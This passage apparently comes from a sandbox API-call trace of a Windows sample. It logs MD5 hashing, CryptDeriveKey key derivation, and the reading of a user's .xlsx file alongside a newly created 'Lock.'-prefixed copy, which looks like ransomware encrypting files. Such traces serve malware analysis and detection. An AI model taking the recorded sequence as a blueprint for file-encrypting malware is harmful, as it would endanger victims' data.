hProv=0x9bea28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0150.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.050] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.050] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0150.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0150.050] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0150.050] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0150.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0150.050] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.050] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.050] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.050] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.050] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.050] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.050] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0150.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa3c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0150.050] CryptHashData (hHash=0x9e21f8, pbData=0x2a72698, dwDataLen=0x3, dwFlags=0x1) returned 1 [0150.050] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.050] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.050] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.050] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.051] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.051] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.051] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.051] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.051] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0150.051] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.051] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0150.051] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.051] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.051] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0150.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa300, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0150.051] CryptDeriveKey (in: hProv=0x9bea28, Algid=0x6601, hBaseData=0x9e21f8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1b38) returned 1 [0150.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.051] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.051] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0150.051] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.051] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0150.052] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0150.052] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0150.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6e80, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0150.052] CryptDestroyHash (hHash=0x9e21f8) returned 1 [0150.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.052] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.052] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.052] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.052] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.052] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/s4dSYQJ4.xlsx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\s4dsyqj4.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4fc [0150.052] SetFilePointerEx (in: hFile=0x4fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.052] SetFilePointerEx (in: hFile=0x4fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0150.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f00 [0150.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0150.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0150.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0150.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0150.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0150.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0150.053] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0150.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0150.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0150.053] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0150.053] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0150.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0150.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0150.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0150.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0150.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0150.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0150.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0150.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0150.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0150.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0150.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0150.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0150.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0150.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0150.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0150.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.054] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0150.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0150.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0150.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0150.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0150.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0150.054] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.s4dSYQJ4.xlsx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.s4dsyqj4.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0150.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0150.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0150.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0150.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0150.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0150.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0150.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0150.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0150.055] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0150.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0150.055] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0150.055] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0150.055] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0150.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0150.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0150.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0150.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0150.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0150.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0150.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0150.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0150.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0150.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0150.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0150.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0150.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0150.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0150.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0150.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0150.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0150.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0150.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0150.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0150.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0150.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0150.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0150.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0150.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0150.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cdd020 [0150.059] SetFilePointerEx (in: hFile=0x4fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0150.059] ReadFile (in: hFile=0x4fc, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x7af, lpOverlapped=0x0) returned 1 [0150.060] ReadFile (in: hFile=0x4fc, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0150.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0150.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0150.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0150.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7af) returned 0x2aae878 [0150.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cdd020 | out: hHeap=0x2af0000) returned 1 [0150.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0150.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0150.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0150.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0150.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0150.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0150.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0150.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0150.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7af) returned 0x2a74958 [0150.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0150.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0150.065] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0150.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0150.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0150.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0150.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0150.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7af) returned 0x2aae878 [0150.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0150.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0150.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0150.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0150.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0150.065] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, 